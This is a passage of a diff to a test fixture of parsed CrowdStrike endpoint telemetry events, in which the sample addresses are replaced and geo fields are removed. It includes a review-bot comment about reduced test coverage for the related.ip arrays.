@@ -2449,20 +2132,20 @@ }, "related": { "hosts": [ - "208.176.144.39", - "ff88:1:1:ffff:c027:b0ff:fe27:830f" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "hash": [ "1620585913" ], "ip": [ - "208.176.144.39", - "ff88:1:1:ffff:c027:b0ff:fe27:830f" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465614500Z", - "original": "{\"OutOctets\":\"0\",\"CreationTimeStamp\":\"\",\"aip\":\"208.176.144.39\",\"OutMulticastPkts\":\"0\",\"InErrors\":\"0\",\"InterfaceAlias\":\"llw0\",\"InDiscards\":\"0\",\"InterfaceIndex\":\"8\",\"event_platform\":\"Mac\",\"InterfaceType\":\"6\",\"id\":\"ffffffff-1111-11eb-b88d-06b7cb0d7bd7\",\"PhysicalAddressLength\":\"6\",\"InUcastPkts\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677521723\",\"event_simpleName\":\"LocalIpAddressIP6\",\"LocalAddressIP6\":\"ff88:1:1:ffff:c027:b0ff:fe27:830f\",\"ConfigStateHash\":\"1620585913\",\"PhysicalAddress\":\"c2-27-b0-27-83-0f\",\"OutErrors\":\"0\",\"InUnknownProtos\":\"0\",\"OutUcastPkts\":\"0\",\"InMulticastPkts\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"InOctets\":\"0\",\"NetLuidIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressIP6MacV1\",\"aid\":\"ffffffff0ad7494e8e817b3903f4eebb\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150747Z", + "original": 
"{\"OutOctets\":\"0\",\"CreationTimeStamp\":\"\",\"aip\":\"67.43.156.14\",\"OutMulticastPkts\":\"0\",\"InErrors\":\"0\",\"InterfaceAlias\":\"llw0\",\"InDiscards\":\"0\",\"InterfaceIndex\":\"8\",\"event_platform\":\"Mac\",\"InterfaceType\":\"6\",\"id\":\"ffffffff-1111-11eb-b88d-06b7cb0d7bd7\",\"PhysicalAddressLength\":\"6\",\"InUcastPkts\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677521723\",\"event_simpleName\":\"LocalIpAddressIP6\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"ConfigStateHash\":\"1620585913\",\"PhysicalAddress\":\"c2-27-b0-27-83-0f\",\"OutErrors\":\"0\",\"InUnknownProtos\":\"0\",\"OutUcastPkts\":\"0\",\"InMulticastPkts\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"InOctets\":\"0\",\"NetLuidIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressIP6MacV1\",\"aid\":\"ffffffff0ad7494e8e817b3903f4eebb\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:21.723Z", "kind": "state", "action": "LocalIpAddressIP6", @@ -2528,21 +2211,12 @@ "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.98.120.25", - "vendor": "crowdstrike", - "ip": "208.98.120.25", "serial_number": "ffffffff23d24c4193ffa6f270775ee5", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:07.037Z", "ecs": { 
@@ -2550,20 +2224,20 @@ }, "related": { "hosts": [ - "208.98.120.25", + "67.43.156.14", "0.0.0.0" ], "hash": [ "3090255842" ], "ip": [ - "208.98.120.25", + "67.43.156.14", "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465621300Z", - "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkListenIP4\",\"ContextTimeStamp\":\"1625677507.037\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364432308748445743\",\"RemotePort\":\"0\",\"aip\":\"208.98.120.25\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"50647\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP4MacV10\",\"id\":\"ffffffff-1111-11eb-8b36-06a8af5164a9\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff23d24c4193ffa6f270775ee5\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677507086\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150753300Z", + "original": "{\"LocalAddressIP4\":\"0.0.0.0\",\"event_simpleName\":\"NetworkListenIP4\",\"ContextTimeStamp\":\"1625677507.037\",\"ConfigStateHash\":\"3090255842\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364432308748445743\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"50647\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP4MacV10\",\"id\":\"ffffffff-1111-11eb-8b36-06a8af5164a9\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff23d24c4193ffa6f270775ee5\",\"RemoteAddressIP4\":\"0.0.0.0\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677507086\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:07.086Z", "kind": "event", "action": "NetworkListenIP4", 
@@ -2603,21 +2277,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.31.216.39", - "vendor": "crowdstrike", - "ip": "208.31.216.39", "serial_number": "ffffffffa7bf46da689501ce58bd6987", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:36.729Z", "file": { 
@@ -2631,18 +2296,18 @@ }, "related": { "hosts": [ - "208.31.216.39" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.31.216.39" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465628Z", - "original": "{\"event_simpleName\":\"ExecutableDeleted\",\"ContextTimeStamp\":\"1625677536.729\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364994904864288322\",\"ContextThreadId\":\"0\",\"aip\":\"208.31.216.39\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ExecutableDeletedMacV1\",\"id\":\"ffffffff-1111-11eb-8ca0-0231588e8cbb\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffa7bf46da689501ce58bd6987\",\"timestamp\":\"1625677536784\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user3/Library/Caches/com.tinyspeck.slackmacgap.ShipIt/update.FXKsmFO/Slack.app/Contents/Frameworks/Squirrel.framework/Versions/A/Resources/ShipIt\"}", + "ingested": "2021-12-09T13:36:11.150759600Z", + "original": "{\"event_simpleName\":\"ExecutableDeleted\",\"ContextTimeStamp\":\"1625677536.729\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364994904864288322\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ExecutableDeletedMacV1\",\"id\":\"ffffffff-1111-11eb-8ca0-0231588e8cbb\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffa7bf46da689501ce58bd6987\",\"timestamp\":\"1625677536784\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user3/Library/Caches/com.tinyspeck.slackmacgap.ShipIt/update.FXKsmFO/Slack.app/Contents/Frameworks/Squirrel.framework/Versions/A/Resources/ShipIt\"}", "created": "2021-07-07T17:05:36.784Z", "kind": "event", "action": "ExecutableDeleted", 
@@ -2680,21 +2345,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.188.8.87", - "vendor": "crowdstrike", - "ip": "208.188.8.87", "serial_number": "fffffffffc2c4e4fa9c08e1a8388e5f9", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:04.542Z", "file": { 
@@ -2710,19 +2366,19 @@ }, "related": { "hosts": [ - "208.188.8.87" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.188.8.87" + "67.43.156.14" ] }, "event": { "action": "GzipFileWritten", - "ingested": "2021-11-22T09:23:55.465634800Z", - "original": "{\"event_simpleName\":\"GzipFileWritten\",\"ContextTimeStamp\":\"1625677504.542\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"362897421906895953\",\"ContextThreadId\":\"0\",\"aip\":\"208.188.8.87\",\"FileIdentifier\":\"04000001000000000000000000000000501f510700000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"GzipFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-9320-06d410e6f705\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffffc2c4e4fa9c08e1a8388e5f9\",\"timestamp\":\"1625677504614\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/powerlog/Library/BatteryLife/Archives/powerlog_2021-07-05_CC5F9FC1.PLSQL.gz\"}", + "ingested": "2021-12-09T13:36:11.150766Z", + "original": "{\"event_simpleName\":\"GzipFileWritten\",\"ContextTimeStamp\":\"1625677504.542\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"362897421906895953\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"04000001000000000000000000000000501f510700000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"GzipFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-9320-06d410e6f705\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffffc2c4e4fa9c08e1a8388e5f9\",\"timestamp\":\"1625677504614\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/powerlog/Library/BatteryLife/Archives/powerlog_2021-07-05_CC5F9FC1.PLSQL.gz\"}", "id": "ffffffff-1111-11eb-9320-06d410e6f705", "created": "2021-07-07T17:05:04.614Z" }, 
@@ -2736,21 +2392,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T01:52:50.595Z", "os": { 
@@ -2761,18 +2408,18 @@ }, "related": { "hosts": [ - "208.165.30.176" + "67.43.156.13" ], "hash": [ "3967242894" ], "ip": [ - "208.165.30.176" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465641500Z", - "original": "{\"event_simpleName\":\"IOServiceRegister\",\"ContextTimeStamp\":\"1625622770.595\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"208.165.30.176\",\"IOServiceClass\":\"IOUSBDevice:IOUSBNub:IOService:IORegistryEntry:OSObject\",\"ConfigBuild\":\"1007.4.0013701.1\",\"IOServicePath\":\"IOService:/IOResources/AppleUSBHostResources/AppleUSBLegacyRoot/AppleUSBVHCIBCE@80000000/Touch Bar Backlight@80700000\",\"event_platform\":\"Mac\",\"IOServiceProperties\":\"\",\"Entitlements\":\"15\",\"name\":\"IOServiceRegisterMacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"IOServiceName\":\"Touch Bar Backlight\",\"timestamp\":\"1625677480056\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150772300Z", + "original": "{\"event_simpleName\":\"IOServiceRegister\",\"ContextTimeStamp\":\"1625622770.595\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"IOServiceClass\":\"IOUSBDevice:IOUSBNub:IOService:IORegistryEntry:OSObject\",\"ConfigBuild\":\"1007.4.0013701.1\",\"IOServicePath\":\"IOService:/IOResources/AppleUSBHostResources/AppleUSBLegacyRoot/AppleUSBVHCIBCE@80000000/Touch Bar Backlight@80700000\",\"event_platform\":\"Mac\",\"IOServiceProperties\":\"\",\"Entitlements\":\"15\",\"name\":\"IOServiceRegisterMacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"IOServiceName\":\"Touch Bar Backlight\",\"timestamp\":\"1625677480056\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:40.056Z", "kind": "event", "action": "IOServiceRegister", 
@@ -2819,21 +2466,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T01:50:02.031Z", "ecs": { 
@@ -2841,18 +2479,18 @@ }, "related": { "hosts": [ - "208.165.30.176" + "67.43.156.13" ], "hash": [ "3967242894" ], "ip": [ - "208.165.30.176" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465648300Z", - "original": "{\"event_simpleName\":\"PtyCreated\",\"ContextTimeStamp\":\"1625622602.031\",\"ConfigStateHash\":\"3967242894\",\"ContextProcessId\":\"364938416497226937\",\"DeviceId\":\"251658248\",\"ContextThreadId\":\"0\",\"aip\":\"208.165.30.176\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"PtyCreatedMacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677478739\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150778600Z", + "original": "{\"event_simpleName\":\"PtyCreated\",\"ContextTimeStamp\":\"1625622602.031\",\"ConfigStateHash\":\"3967242894\",\"ContextProcessId\":\"364938416497226937\",\"DeviceId\":\"251658248\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"PtyCreatedMacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677478739\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:38.739Z", "kind": "event", "action": "PtyCreated", 
@@ -2879,26 +2517,8 @@ "type": "macos" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-OK", - "city_name": "Tulsa", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Oklahoma", - "location": { - "lon": -95.9306, - "lat": 36.0284 - } - }, - "as": { - "number": 1239, - "organization": { - "name": "Sprint" - } - }, - "address": "208.27.233.142", - "ip": "208.27.233.142" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "url": { "scheme": "http" @@ -2907,21 +2527,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.69.76.234", - "vendor": "crowdstrike", - "ip": "208.69.76.234", "serial_number": "ffffffff5ae3449ab33a1809fe6c5ce2", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:35.967Z", "ecs": { 
@@ -2929,20 +2540,18 @@ }, "related": { "hosts": [ - "208.69.76.234", - "208.27.233.142" + "67.43.156.14" ], "hash": [ "1803419442" ], "ip": [ - "208.69.76.234", - "208.27.233.142" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465655100Z", - "original": "{\"LocalAddressIP4\":\"208.27.233.142\",\"event_simpleName\":\"LocalIpAddressRemovedIP4\",\"ConfigStateHash\":\"1803419442\",\"aip\":\"208.69.76.234\",\"InterfaceIndex\":\"18\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"NetLuidIndex\":\"2\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressRemovedIP4MacV1\",\"id\":\"ffffffff-1111-11eb-b7b7-066cc89bcebf\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff5ae3449ab33a1809fe6c5ce2\",\"timestamp\":\"1625677475967\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150784800Z", + "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"LocalIpAddressRemovedIP4\",\"ConfigStateHash\":\"1803419442\",\"aip\":\"67.43.156.14\",\"InterfaceIndex\":\"18\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"NetLuidIndex\":\"2\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressRemovedIP4MacV1\",\"id\":\"ffffffff-1111-11eb-b7b7-066cc89bcebf\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff5ae3449ab33a1809fe6c5ce2\",\"timestamp\":\"1625677475967\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:35.967Z", "kind": "state", "action": "LocalIpAddressRemovedIP4", 
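Review bot: Substituting `67.43.156.14` for both `aip` and `LocalAddressIP4` in this event collapses `related.hosts` and `related.ip` from two entries to one, so the fixture no longer checks that a local address distinct from the observer address is appended on the `LocalIpAddressRemovedIP4` path (the IPv6 events above keep two distinct values, and the one-element result here implies de-duplication that is now exercised only by accident). Using the other supported value for the local address in the test input, `\"LocalAddressIP4\":\"67.43.156.13\"`, would keep the two-element arrays and preserve the coverage the old `208.27.233.142`/`208.69.76.234` pair provided.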
@@ -2996,21 +2605,12 @@ "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.144.51.215", - "vendor": "crowdstrike", - "ip": "208.144.51.215", "serial_number": "ffffffff335f47ca89cad6a19f203bbd", + "address": "67.43.156.13", "type": "agent", - "version": "1007.8.0011308.1" + "version": "1007.8.0011308.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:04:34.875Z", "ecs": { 
@@ -3018,20 +2618,20 @@ }, "related": { "hosts": [ - "208.144.51.215", + "67.43.156.13", "0:0:0:0:0:0:0:1" ], "hash": [ "1701000200" ], "ip": [ - "208.144.51.215", + "67.43.156.13", "0:0:0:0:0:0:0:1" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465662100Z", - "original": "{\"event_simpleName\":\"NetworkCloseIP6\",\"ContextTimeStamp\":\"1625677474.875\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"12241681491990\",\"RemotePort\":\"9\",\"aip\":\"208.144.51.215\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"59999\",\"Entitlements\":\"15\",\"name\":\"NetworkCloseIP6LinV6\",\"id\":\"ffffffff-1111-11eb-8130-02cde7751097\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff335f47ca89cad6a19f203bbd\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677475413\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150791400Z", + "original": "{\"event_simpleName\":\"NetworkCloseIP6\",\"ContextTimeStamp\":\"1625677474.875\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"12241681491990\",\"RemotePort\":\"9\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"59999\",\"Entitlements\":\"15\",\"name\":\"NetworkCloseIP6LinV6\",\"id\":\"ffffffff-1111-11eb-8130-02cde7751097\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff335f47ca89cad6a19f203bbd\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677475413\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:35.413Z", "kind": "event", "action": "NetworkCloseIP6", 
@@ -3057,21 +2657,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.203.151.21", - "vendor": "crowdstrike", - "ip": "208.203.151.21", "serial_number": "ffffffffa74a4c89b9984a3a7124bb9d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:50.580Z", "os": { 
@@ -3082,18 +2673,18 @@ }, "related": { "hosts": [ - "208.203.151.21" + "67.43.156.14" ], "hash": [ "1156120155" ], "ip": [ - "208.203.151.21" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465668800Z", - "original": "{\"ConfigBuild\":\"1007.8.0011611.1\",\"event_simpleName\":\"ConfigStateUpdate\",\"event_platform\":\"Lin\",\"ConfigStateHash\":\"1156120155\",\"ConfigStateData\":\"0,0,1007.8.0011611.1|1,c,0|1,22,6|1,59,2d|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|\",\"name\":\"ConfigStateUpdateLinV2\",\"aip\":\"208.203.151.21\",\"id\":\"ffffffff-1111-11eb-af89-06c111484f9f\",\"aid\":\"ffffffffa74a4c89b9984a3a7124bb9d\",\"timestamp\":\"1625677490580\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150797700Z", + "original": "{\"ConfigBuild\":\"1007.8.0011611.1\",\"event_simpleName\":\"ConfigStateUpdate\",\"event_platform\":\"Lin\",\"ConfigStateHash\":\"1156120155\",\"ConfigStateData\":\"0,0,1007.8.0011611.1|1,c,0|1,22,6|1,59,2d|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|\",\"name\":\"ConfigStateUpdateLinV2\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-af89-06c111484f9f\",\"aid\":\"ffffffffa74a4c89b9984a3a7124bb9d\",\"timestamp\":\"1625677490580\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:50.580Z", "kind": "event", "action": "ConfigStateUpdate", 
@@ -3142,21 +2733,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.141.219.156", - "vendor": "crowdstrike", - "ip": "208.141.219.156", "serial_number": "ffffffff0cd64fb78626ab1b6c65ac8c", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:53.531Z", "ecs": { 
@@ -3164,18 +2746,18 @@ }, "related": { "hosts": [ - "208.141.219.156" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.141.219.156" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465675600Z", - "original": "{\"event_simpleName\":\"SuspiciousDnsRequest\",\"ContextTimeStamp\":\"1625677493.531\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364839648316192383\",\"DomainName\":\"hg-t2.dotice.me\",\"ContextThreadId\":\"0\",\"aip\":\"208.141.219.156\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"SuspiciousDnsRequestMacV1\",\"id\":\"ffffffff-1111-11eb-a4a3-02cbdfb8f529\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff0cd64fb78626ab1b6c65ac8c\",\"timestamp\":\"1625677493756\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"RequestType\":\"1\"}", + "ingested": "2021-12-09T13:36:11.150804Z", + "original": "{\"event_simpleName\":\"SuspiciousDnsRequest\",\"ContextTimeStamp\":\"1625677493.531\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364839648316192383\",\"DomainName\":\"hg-t2.dotice.me\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"SuspiciousDnsRequestMacV1\",\"id\":\"ffffffff-1111-11eb-a4a3-02cbdfb8f529\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff0cd64fb78626ab1b6c65ac8c\",\"timestamp\":\"1625677493756\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"RequestType\":\"1\"}", "created": "2021-07-07T17:04:53.756Z", "kind": "alert", "action": "SuspiciousDnsRequest", 
@@ -3200,21 +2782,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.233.54.217", - "vendor": "crowdstrike", - "ip": "208.233.54.217", "serial_number": "ffffffffabd047b1a86c1fcd8ef22b59", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:30.922Z", "os": { 
@@ -3225,18 +2798,18 @@ }, "related": { "hosts": [ - "208.233.54.217" + "67.43.156.14" ], "hash": [ "1156120155" ], "ip": [ - "208.233.54.217" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465682400Z", - "original": "{\"Parameter2\":\"0\",\"event_simpleName\":\"ErrorEvent\",\"Parameter1\":\"18446744072635810412\",\"Parameter3\":\"0\",\"ConfigStateHash\":\"1156120155\",\"aip\":\"208.233.54.217\",\"Line\":\"96\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"ErrorStatus\":\"3759276032\",\"name\":\"ErrorEventLinV1\",\"id\":\"ffffffff-1111-11eb-bdd3-0681aa29cecb\",\"Facility\":\"16778240\",\"aid\":\"ffffffffabd047b1a86c1fcd8ef22b59\",\"File\":\"0\",\"timestamp\":\"1625677530922\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150810300Z", + "original": 